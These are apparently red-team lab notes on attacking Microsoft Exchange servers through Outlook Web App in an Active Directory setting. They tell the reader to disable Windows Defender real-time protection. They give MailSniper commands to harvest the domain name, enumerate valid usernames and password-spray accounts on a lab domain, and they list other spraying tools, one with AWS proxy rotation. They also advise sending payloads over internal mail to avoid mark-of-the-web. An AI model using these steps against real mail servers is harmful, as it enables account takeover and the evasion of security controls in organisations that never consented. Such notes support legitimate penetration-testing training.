We can carry out some attacks against mail servers in an Active Directory environment on a Windows machine.
Turn off Windows Defender Real-Time Protection
These software might be quanrantined by Windows Defender if real-time protection is left on.
- dafthack/MailSniper: enumerate & attack Microsoft Exchange mail servers (using OWA/Outlook Web App as examples below)
- Get NetBIOS name:
Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io
- Enumerate valid usernames:
Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList names.txt -OutFile valid.txt
- Password spray:
Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList valid.txt -Password Summer2022
- Get NetBIOS name:
- blacklanternsecurity/TREVORspray: password spraying tool with many features & supported protocols
- knavesec/CredMaster: password spray & brute force with AWS passthrough proxy support
Send attacks over internal Outlook mail if you can
Payloads sent over internal Outlook mail will not be tainted with mark of the web.